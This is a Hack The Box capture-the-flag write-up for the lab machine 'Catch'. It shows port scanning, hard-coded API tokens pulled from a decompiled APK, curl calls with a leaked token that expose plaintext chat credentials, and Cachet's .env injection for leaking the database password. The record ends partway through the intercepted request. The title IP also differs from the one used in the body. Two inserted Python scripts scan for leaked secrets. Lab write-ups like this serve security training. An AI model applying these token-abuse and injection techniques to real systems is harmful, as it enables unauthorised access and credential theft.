
Hack The Box Write-Up Catch - 10.10.10.150

About Catch

In this post I write up the machine Catch from Hack The Box, an online platform for training your ethical hacking and penetration testing skills.

Catch is a ‘Medium’ rated box. Submitting the user.txt flag raises your points by 15, and submitting the root flag raises them by 30.

Machine Info

Machine Name: Catch
Difficulty: Medium
Points: 30
Release Date: 12 Mar 2022
IP: 10.10.11.150
Creator: MrR3b00t

Recon

Port scan with Nmap

As always, we start with a port scan using Nmap.

nmap -sC -sV -oA ./nmap/catch 10.10.11.150

The results.

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 15:31 EDT                                                                                                      
Nmap scan report for 10.10.11.150                                                                                                                                    
Host is up (0.037s latency).   
Not shown: 995 closed tcp ports (reset)                                                                                                                              
PORT     STATE SERVICE VERSION 
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)                                                                                  
| ssh-hostkey:                 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)                                                                                                       
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)                                                                                                      
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)                                                                                                    
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))                                                                                                                
|_http-title: Catch Global Systems                                                                                                                                   
|_http-server-header: Apache/2.4.41 (Ubuntu)                                                                                                                         
3000/tcp open  ppp?            
| fingerprint-strings:         
|   GenericLines, Help, RTSPRequest:                                                                                                                                 
|     HTTP/1.1 400 Bad Request 
|     Content-Type: text/plain; charset=utf-8                                                                                                                        
|     Connection: close        
|     Request                  
|   GetRequest:                
|     HTTP/1.0 200 OK          
|     Content-Type: text/html; charset=UTF-8                                                                                                                         
|     Set-Cookie: i_like_gitea=cd0e3aec29bc0927; Path=/; HttpOnly                                                                                                    
|     Set-Cookie: _csrf=KmL1zB2LzrSeuqdLkkzuyXBfYGI6MTY0ODU4MjYzMDg2NDEwMTg4MA; Path=/; Expires=Wed, 30 Mar 2022 19:37:10 GMT; HttpOnly; SameSite=Lax                
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly                                                                                                        
|     X-Frame-Options: SAMEORIGIN                                                                                                                                    
|     Date: Tue, 29 Mar 2022 19:37:10 GMT                                                                                                                            
|     <!DOCTYPE html>          
|     <html lang="en-US" class="theme-">                                                                                                                             
|     <head data-suburl="">    
|     <meta charset="utf-8">   
|     <meta name="viewport" content="width=device-width, initial-scale=1">                                                                                           
|     <meta http-equiv="x-ua-compatible" content="ie=edge">                                                                                                          
|     <title> Catch Repositories </title>                                                                                                                            
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
|   HTTPOptions:               
|     HTTP/1.0 405 Method Not Allowed
|     Set-Cookie: i_like_gitea=64ae5bfea4fab3f9; Path=/; HttpOnly
|     Set-Cookie: _csrf=YKpY7gGh7YxkWdl88DiLUqYjRks6MTY0ODU4MjYzNjA4MDY3MTQ5MA; Path=/; Expires=Wed, 30 Mar 2022 19:37:16 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 29 Mar 2022 19:37:16 GMT 
|_    Content-Length: 0
5000/tcp open  upnp? 
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, RTSPRequest, SMBProgNeg, ZendJavaBridge: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 302 Found
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy: 
|     X-Content-Security-Policy: 
|     X-WebKit-CSP: 
|     X-UA-Compatible: IE=Edge,chrome=1
|     Location: /login
|     Vary: Accept, Accept-Encoding
|     Content-Type: text/plain; charset=utf-8
|     Content-Length: 28
|     Set-Cookie: connect.sid=s%3AufEqW9J3AzGppkpbAzqPspH4hSftMyeZ.aN9l0nGLbGJ%2F5%2F%2F%2FH%2FJ1PTmS0ORVWzBEeJzwhDn5G%2F4; Path=/; HttpOnly
|     Date: Tue, 29 Mar 2022 19:37:15 GMT 
|     Connection: close
|     Found. Redirecting to /login
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy: 
|     X-Content-Security-Policy: 
|     X-WebKit-CSP: 
|     X-UA-Compatible: IE=Edge,chrome=1
|     Allow: GET,HEAD
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 8
|     ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
|     Set-Cookie: connect.sid=s%3ARhV4T38uhNRWh73rUewd0tEsSwxMaW3O.2zYHa17op04iLlEiKC%2FzGvUje%2FSuibMKX1jzFIHpCEY; Path=/; HttpOnly
|     Vary: Accept-Encoding
|     Date: Tue, 29 Mar 2022 19:37:16 GMT 
|     Connection: close
|_    GET,HEAD
8000/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.29 (Ubuntu)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.92%I=7%D=3/29%Time=62435E96%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,19F2,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20i_like_gitea=cd0e3aec2
SF:9bc0927;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=KmL1zB2LzrSeuqd
SF:LkkzuyXBfYGI6MTY0ODU4MjYzMDg2NDEwMTg4MA;\x20Path=/;\x20Expires=Wed,\x20
SF:30\x20Mar\x202022\x2019:37:10\x20GMT;\x20HttpOnly;\x20SameSite=Lax\r\nS
SF:et-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly\r\nX
SF:-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2029\x20Mar\x202022\x20
SF:19:37:10\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20c
SF:lass=\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-
SF:8\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20
SF:initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20conten
SF:t=\"ie=edge\">\n\t<title>\x20Catch\x20Repositories\x20</title>\n\t<link
SF:\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjo
SF:iQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcy
SF:IsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W
SF:3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz")%r(Help,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,17F
SF:,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nSet-Cookie:\x20i_like
SF:_gitea=64ae5bfea4fab3f9;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf
SF:=YKpY7gGh7YxkWdl88DiLUqYjRks6MTY0ODU4MjYzNjA4MDY3MTQ5MA;\x20Path=/;\x20
SF:Expires=Wed,\x2030\x20Mar\x202022\x2019:37:16\x20GMT;\x20HttpOnly;\x20S
SF:ameSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\
SF:x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2029\x2
SF:0Mar\x202022\x2019:37:16\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTS
SF:PRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.92%I=7%D=3/29%Time=62435E9B%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,246,"HTTP/1\.1\x20302\x20Found\r\nX-Frame-Options:\x20SAMEORIG
SF:IN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-Security-Policy:
SF:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:\x20\r\nX-UA-Com
SF:patible:\x20IE=Edge,chrome=1\r\nLocation:\x20/login\r\nVary:\x20Accept,
SF:\x20Accept-Encoding\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nContent-Length:\x2028\r\nSet-Cookie:\x20connect\.sid=s%3AufEqW9J3AzGpp
SF:kpbAzqPspH4hSftMyeZ\.aN9l0nGLbGJ%2F5%2F%2F%2FH%2FJ1PTmS0ORVWzBEeJzwhDn5
SF:G%2F4;\x20Path=/;\x20HttpOnly\r\nDate:\x20Tue,\x2029\x20Mar\x202022\x20
SF:19:37:15\x20GMT\r\nConnection:\x20close\r\n\r\nFound\.\x20Redirecting\x
SF:20to\x20/login")%r(RTSPRequest,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,"HTTP/1\.1\x
SF:20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(SMBProgNeg,
SF:2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"
SF:)%r(ZendJavaBridge,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection
SF::\x20close\r\n\r\n")%r(HTTPOptions,245,"HTTP/1\.1\x20200\x20OK\r\nX-Fra
SF:me-Options:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content
SF:-Type-Options:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nC
SF:ontent-Security-Policy:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebK
SF:it-CSP:\x20\r\nX-UA-Compatible:\x20IE=Edge,chrome=1\r\nAllow:\x20GET,HE
SF:AD\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x
SF:208\r\nETag:\x20W/\"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg\"\r\nSet-Cookie:\x20c
SF:onnect\.sid=s%3ARhV4T38uhNRWh73rUewd0tEsSwxMaW3O\.2zYHa17op04iLlEiKC%2F
SF:zGvUje%2FSuibMKX1jzFIHpCEY;\x20Path=/;\x20HttpOnly\r\nVary:\x20Accept-E
SF:ncoding\r\nDate:\x20Tue,\x2029\x20Mar\x202022\x2019:37:16\x20GMT\r\nCon
SF:nection:\x20close\r\n\r\nGET,HEAD")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSStatusRequestTCP,
SF:2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"
SF:)%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close
SF:\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.84 seconds

The Nmap scan discovered several open ports. The first is the default SSH port, 22/tcp. The second is the default HTTP port, 80/tcp; the banner shows Apache 2.4.41 behind it. The third is 3000/tcp, where a website with the title Catch Repositories is running; the i_like_gitea cookie in the fingerprint shows it is a Gitea instance. The fourth is 5000/tcp, which also serves a web application (it redirects to /login). Last but not least, 8000/tcp serves a website with the title Catch Global Systems on Apache 2.4.29.

Enumeration

Website

We start looking for the initial foothold on the website. After adding the hostname catch.htb to our /etc/hosts file we can visit it at http://catch.htb.

Hack The Box Catch walkthrough website

The website does not show much more information than just a ‘Download now’ button. After clicking on this button, the browser starts downloading the file catchv1.0.apk.

Enumerate APK-file

With apktool we can decompile this APK file for further analysis. Before we dive into the decompiled files, we can scan the APK for URLs and secrets with the tool apkleaks (which runs apktool itself).

┌──(root💀kali)-[/home/kali/htb/machines/catch]
└─# apkleaks -f catchv1.0.apk

     _    ____  _  ___               _        
    / \  |  _ \| |/ / |    ___  __ _| | _____ 
   / _ \ | |_) | ' /| |   / _ \/ _` | |/ / __|
  / ___ \|  __/| . \| |__|  __/ (_| |   <\__ \
 /_/   \_\_|   |_|\_\_____\___|\__,_|_|\_\___/
 v2.6.1
 --
 Scanning APK file for URIs, endpoints & secrets
 (c) 2020-2021, dwisiswant0

** Decompiling APK...
INFO  - loading ...
INFO  - processing ...
ERROR - finished with errors, count: 1

** Scanning against 'com.example.acatch'

[JSON_Web_Token]
- androidGradlePluginVersion=7.0.4

[LinkFinder]
- /...
- /proc/self/fd/
- activity_choser_model_history.xml
- http://schemas.android.com/apk/res-auto
- http://schemas.android.com/apk/res/android
- https://status.catch.htb/
- share_history.xml

** Results saved into '/tmp/apkleaks-oea2sdcy.txt'.

We have found the subdomain status.catch.htb, which we also add to our /etc/hosts file. Let’s search the decompiled files with grep for juicy information. In most cases I look for words like username, password, secret, token, etc.

┌──(root💀kali)-[/home/kali/htb/machines/catch]
└─# grep -r "token" ./catchv1.0
...
./catchv1.0/res/values/public.xml:    <public type="string" name="gitea_token" id="0x7f0e0028" />
./catchv1.0/res/values/public.xml:    <public type="string" name="lets_chat_token" id="0x7f0e002c" />
./catchv1.0/res/values/public.xml:    <public type="string" name="slack_token" id="0x7f0e0065" />
./catchv1.0/res/values/strings.xml:    <string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
./catchv1.0/res/values/strings.xml:    <string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
./catchv1.0/res/values/strings.xml:    <string name="slack_token">xoxp-23984754863-2348975623103</string>
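As an added example (my own code, not from the write-up or from the app), the following Python script does what the grep above does by hand: it parses a decompiled res/values/strings.xml, flags values shaped like API tokens, and decodes the Let's Chat token to show that it is base64 of <user id>:<secret>, so the account a leaked token belongs to can be read off directly. The XML below is a constructed sample built from the three values the grep found; the rule names, regexes and function names are my own.

```python
"""Scan decompiled Android string resources for hard-coded secrets.

Added example (not part of the original write-up or of the app): it parses a
res/values/strings.xml as produced by apktool, flags values that look like API
tokens, and decodes the Let's Chat token to show its structure.
"""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed res/values/strings.xml with the three tokens
# the write-up found via grep.
SAMPLE_STRINGS_XML = """<resources>
    <string name="app_name">Catch</string>
    <string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
    <string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
    <string name="slack_token">xoxp-23984754863-2348975623103</string>
</resources>
"""

# Detection rules: (label, regex matched against the whole value).
# These are generic token shapes, not a complete secret-scanning ruleset.
RULES = [
    ("slack_user_token", re.compile(r"^xox[abpr]-[0-9A-Za-z-]+$")),
    ("hex_40_token", re.compile(r"^[0-9a-f]{40}$")),  # Gitea/GitHub-style personal token
    ("base64_blob", re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")),
]
# Resource names that are suspicious regardless of the value's shape.
NAME_HINT = re.compile(r"(token|secret|password|passwd|api_?key)", re.IGNORECASE)


def decode_id_secret(value):
    """If value is base64 of '<24-hex id>:<hex secret>', return (id, secret), else None.

    Let's Chat API tokens have this layout: the left side is the ObjectId of the
    user that owns the token, so a decoded token tells you which account it acts as.
    """
    try:
        raw = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    m = re.fullmatch(r"([0-9a-f]{24}):([0-9a-f]+)", raw)
    return (m.group(1), m.group(2)) if m else None


def scan_strings_xml(xml_text):
    """Return findings: dicts with name, labels, value and (for id:secret tokens) owner_id."""
    findings = []
    root = ET.fromstring(xml_text)
    for node in root.iter("string"):
        name = node.get("name", "")
        value = (node.text or "").strip()
        labels = [label for label, rx in RULES if rx.match(value)]
        if not labels and NAME_HINT.search(name):
            labels = ["suspicious_name"]
        if not labels:
            continue
        finding = {"name": name, "labels": labels, "value": value}
        decoded = decode_id_secret(value)
        if decoded:
            finding["owner_id"] = decoded[0]
            finding["labels"].append("id_colon_secret")
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_strings_xml(SAMPLE_STRINGS_XML):
        print(f"{f['name']:16s} {','.join(f['labels']):32s} owner={f.get('owner_id', '-')}")
```

The decoded owner id of the Let's Chat token is the id of the admin account in the /users listing further down, so the token found in the APK is an admin-level token; on the defending side that is the account whose token needs rotating.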

The interesting part is about to start: a whole bunch of rabbit holes. This section took me several hours before I figured out which gate leads to the initial foothold.

Initial Access

API

We can communicate with the Let’s Chat service on port 5000 through its REST API, using the lets_chat_token from the APK as the bearer token. Let’s Chat provides some documentation on its GitHub page.

With this API call we can get a list of user accounts.

curl -X GET -H "Content-Type:application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" http://catch.htb:5000/users
[
    {
        "id": "61b86aead984e2451036eb16",
        "firstName": "Administrator",
        "lastName": "NA",
        "username": "admin",
        "displayName": "Admin",
        "avatar": "e2b5310ec47bba317c5f1b5889e96f04",
        "openRooms": [
            "61b86b28d984e2451036eb17",
            "61b86b3fd984e2451036eb18",
            "61b8708efe190b466d476bfb"
        ]
    },
    {
        "id": "61b86dbdfe190b466d476bf0",
        "firstName": "John",
        "lastName": "Smith",
        "username": "john",
        "displayName": "John",
        "avatar": "f5504305b704452bba9c94e228f271c4",
        "openRooms": [
            "61b86b3fd984e2451036eb18",
            "61b86b28d984e2451036eb17"
        ]
    },
    {
        "id": "61b86e40fe190b466d476bf2",
        "firstName": "Will",
        "lastName": "Robinson",
        "username": "will",
        "displayName": "Will",
        "avatar": "7c6143461e935a67981cc292e53c58fc",
        "openRooms": [
            "61b86b3fd984e2451036eb18",
            "61b86b28d984e2451036eb17"
        ]
    },
    {
        "id": "61b86f15fe190b466d476bf5",
        "firstName": "Lucas",
        "lastName": "NA",
        "username": "lucas",
        "displayName": "Lucas",
        "avatar": "b36396794553376673623dc0f6dec9bb",
        "openRooms": [
            "61b86b28d984e2451036eb17",
            "61b86b3fd984e2451036eb18"
        ]
    }
]

With the following command, we can find the chat rooms.

curl -X GET -H "Content-Type:application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" http://catch.htb:5000/rooms
[
    {
        "id": "61b86b28d984e2451036eb17",
        "slug": "status",
        "name": "Status",
        "description": "Cachet Updates and Maintenance",
        "lastActive": "2021-12-14T10:34:20.749Z",
        "created": "2021-12-14T10: 00: 08.384Z",
        "owner": "61b86aead984e2451036eb16",
        "private": false,
        "hasPassword": false,
        "participants": []
    },
    {
        "id": "61b8708efe190b466d476bfb",
        "slug": "android_dev",
        "name": "Android Development",
        "description": "Android App Updates, Issues & More",
        "lastActive": "2021-12-14T10: 24: 21.145Z",
        "created": "2021-12-14T10: 23: 10.474Z",
        "owner": "61b86aead984e2451036eb16",
        "private": false,
        "hasPassword": false,
        "participants": []
    },
    {
        "id": "61b86b3fd984e2451036eb18",
        "slug": "employees",
        "name": "Employees",
        "description": "New Joinees, Org updates",
        "lastActive": "2021-12-14T10:18:04.710Z",
        "created": "2021-12-14T10:00:31.043Z",
        "owner": "61b86aead984e2451036eb16",
        "private": false,
        "hasPassword": false,
        "participants": []
    }
]

From the chat room called status we can read all messages sent back and forth between the users.

curl -X GET -H "Content-Type:application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" http://catch.htb:5000/rooms/61b86b28d984e2451036eb17/messages

We have discovered some juicy information: the username and password combination john:E}V!mywu_69T4C}W.

[
    {
        "id": "61b8732cfe190b466d476c02",
        "text": "ah sure!",
        "posted": "2021-12-14T10:34:20.749Z",
        "owner": "61b86dbdfe190b466d476bf0",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b8731ffe190b466d476c01",
        "text": "You should actually include this task to your list as well as a part of quarterly audit",
        "posted": "2021-12-14T10:34:07.449Z",
        "owner": "61b86aead984e2451036eb16",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b872b9fe190b466d476c00",
        "text": "Also make sure we've our systems, applications and databases up-to-date.",
        "posted": "2021-12-14T10:32:25.514Z",
        "owner": "61b86dbdfe190b466d476bf0",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b87282fe190b466d476bff",
        "text": "Excellent! ",
        "posted": "2021-12-14T10:31:30.403Z",
        "owner": "61b86aead984e2451036eb16",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b87277fe190b466d476bfe",
        "text": "Why not. We've this in our todo list for next quarter",
        "posted": "2021-12-14T10:31:19.094Z",
        "owner": "61b86dbdfe190b466d476bf0",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b87241fe190b466d476bfd",
        "text": "@john is it possible to add SSL to our status domain to make sure everything is secure ? ",
        "posted": "2021-12-14T10:30:25.108Z",
        "owner": "61b86aead984e2451036eb16",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b8702dfe190b466d476bfa",
        "text": "Here are the credentials `john :  E}V!mywu_69T4C}W`",
        "posted": "2021-12-14T10:21:33.859Z",
        "owner": "61b86f15fe190b466d476bf5",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b87010fe190b466d476bf9",
        "text": "Sure one sec.",
        "posted": "2021-12-14T10:21:04.635Z",
        "owner": "61b86f15fe190b466d476bf5",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b86fb1fe190b466d476bf8",
        "text": "Can you create an account for me ? ",
        "posted": "2021-12-14T10:19:29.677Z",
        "owner": "61b86dbdfe190b466d476bf0",
        "room": "61b86b28d984e2451036eb17"
    },
    {
        "id": "61b86f4dfe190b466d476bf6",
        "text": "Hey Team! I'll be handling the `status.catch.htb` from now on. Lemme know if you need anything from me. ",
        "posted": "2021-12-14T10:17:49.761Z",
        "owner": "61b86f15fe190b466d476bf5",
        "room": "61b86b28d984e2451036eb17"
    }
]
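The messages above only carry owner ids, so it is not obvious who posted what. As an added example (my own code, not from the write-up or from Let's Chat), the script below joins the /users and /rooms/<id>/messages documents so each message is attributed to a username, then flags messages that carry credential-like content. This is the check a defender would run over a chat export to find shared passwords; the JSON samples are constructed from trimmed copies of the responses shown above, and the regexes and function names are mine.

```python
"""Flag credential-looking messages in a Let's Chat room export.

Added example, not part of the original write-up or of Let's Chat: joins the
/users and /rooms/<id>/messages documents (trimmed, constructed samples below)
so each message gets a username, then flags credential-like content.
"""
import json
import re

# Constructed sample: trimmed from the /users response in the write-up.
USERS_JSON = """[
  {"id": "61b86aead984e2451036eb16", "username": "admin"},
  {"id": "61b86dbdfe190b466d476bf0", "username": "john"},
  {"id": "61b86f15fe190b466d476bf5", "username": "lucas"}
]"""

# Constructed sample: three messages from the 'status' room in the write-up.
MESSAGES_JSON = """[
  {"id": "61b872b9fe190b466d476c00",
   "text": "Also make sure we've our systems, applications and databases up-to-date.",
   "posted": "2021-12-14T10:32:25.514Z", "owner": "61b86dbdfe190b466d476bf0",
   "room": "61b86b28d984e2451036eb17"},
  {"id": "61b8702dfe190b466d476bfa",
   "text": "Here are the credentials `john :  E}V!mywu_69T4C}W`",
   "posted": "2021-12-14T10:21:33.859Z", "owner": "61b86f15fe190b466d476bf5",
   "room": "61b86b28d984e2451036eb17"},
  {"id": "61b86fb1fe190b466d476bf8",
   "text": "Can you create an account for me ? ",
   "posted": "2021-12-14T10:19:29.677Z", "owner": "61b86dbdfe190b466d476bf0",
   "room": "61b86b28d984e2451036eb17"}
]"""

# A '<user> : <password>' pair inside backticks, as people tend to paste it.
PAIR_IN_BACKTICKS = re.compile(r"`\s*([A-Za-z0-9_.-]+)\s*:\s*(\S+)\s*`")
# Words that announce a secret is coming, even without a parseable pair.
TRIGGER_WORDS = re.compile(r"\b(credentials?|password|passwd|api[ -]?key|token)\b", re.IGNORECASE)


def build_user_map(users_json):
    """Map user id -> username from a /users document."""
    return {u["id"]: u["username"] for u in json.loads(users_json)}


def flag_messages(messages_json, user_map):
    """Return findings sorted by post time: (posted, author, reason, leaked_username).

    leaked_username is the account named in a pasted '<user> : <password>' pair,
    or None when only a trigger word matched. The password itself is deliberately
    not returned, so the report does not become a second copy of the leak.
    """
    findings = []
    for msg in json.loads(messages_json):
        text = msg.get("text", "")
        author = user_map.get(msg.get("owner"), "unknown")
        pair = PAIR_IN_BACKTICKS.search(text)
        if pair:
            findings.append((msg["posted"], author, "credential_pair", pair.group(1)))
        elif TRIGGER_WORDS.search(text):
            findings.append((msg["posted"], author, "trigger_word", None))
    return sorted(findings)


if __name__ == "__main__":
    users = build_user_map(USERS_JSON)
    for posted, author, reason, leaked in flag_messages(MESSAGES_JSON, users):
        print(f"{posted} {author:8s} {reason:16s} account={leaked}")
```

Run against the sample, the only hit is the message from lucas that hands john his account; on a real export the trigger-word rule will be noisy, which is why the two reasons are reported separately.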

Access to the Status Dashboard

Hack The Box Cachet access status dashboard

We add the hostname status.catch.htb to our /etc/hosts file. With these credentials we can log in at http://status.catch.htb. The site runs Cachet 2.4.0-dev, which holds three vulnerabilities.

Change the request

Cachet stores the values submitted on the mail settings page in the application’s .env file, and the dotenv loader expands ${VAR} references when that file is read. Intercepting the form submission and setting mail_driver to ${DB_PASSWORD} therefore makes the application try to use the database password as a mail driver name, and the resulting “Driver [...] not supported” error writes that value to the log. Because the values are written without sanitising, a newline in mail_host appends further keys to .env, here a Redis session configuration pointing at our own host. The intercepted request:

POST /dashboard/settings/mail HTTP/1.1
Host: catch.htb:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------310896443037174447463705833016
Content-Length: 956
Origin: http://catch.htb:8000
Connection: close
Referer: http://catch.htb:8000/dashboard/settings/mail
